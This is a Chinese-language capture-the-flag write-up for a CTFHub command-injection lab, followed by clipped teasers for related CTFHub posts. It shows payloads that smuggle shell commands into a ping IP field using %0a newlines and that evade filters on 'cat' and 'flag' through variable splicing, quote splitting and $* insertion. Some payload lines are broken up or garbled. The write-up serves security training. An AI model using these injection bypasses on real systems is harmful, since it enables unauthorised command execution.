題目考點
命令注入
過濾運算子、過濾目錄分隔符、過濾反斜槓、過濾空格、過濾封號、過濾cat、過濾關鍵字flag和ctfhub
首先我們要使用ls列目錄,發現這裡過濾了運算子,繞過的方式有%0a、%0d、%0d%0a,經測試這裡可以使用%0a
127.0
.0.1
%0als
a=c;b=at;c=fl;d=ag;
$a$b
$c$d
127.0
.0.1
%0als$
fl$*ag_is_here
cat過濾繞過
因為過濾了cat,我們這裡使用單引號繞過過濾,如ca』't
構造payload
127.0
.0.1
%0acd$
fl$ag_is_here
%0aca''t$
fl$a
*g*********x.php
CTFHub 技能樹 命令注入 無過濾
進入頁面後給出的原始碼,題目要求輸入ip位址執行ping命令 res false if isset get ip get ip exec cmd res doctype html ctfhub 命令注入 無過濾 title head h1 由於沒有採用過濾,所以我們直接進行拼接,輸入192.168....
ctfhub技能樹 彩蛋
彩蛋題建議大家首先自己動手去找一找 做 好 準 備 後 再 看 下 文 使用網域名稱查詢工具查詢子網域名稱 隨便開啟乙個題目,抓包 在url中間新增換行或空格,再放包,即可拿到flag 在writeup裡搜尋egg即可拿到flag 在工具裡搜尋egg,即可拿到flag flag就在鏈結裡 乙個套路 ...
CTFHub 字元型SQL注入
目錄 一 判斷是否存在注入 二 判斷select語句中有幾列 三 判斷顯示的資訊是第幾列的資訊 四 利用函式來收集資料庫資訊 五 通過union查詢資料庫 1 獲取所有資料庫名稱 2 查詢資料庫中有多少個表 3 查詢指定資料庫中的表名 4 查詢指定資料庫指定表中的列名 5 查詢指定資料庫指定表的列的...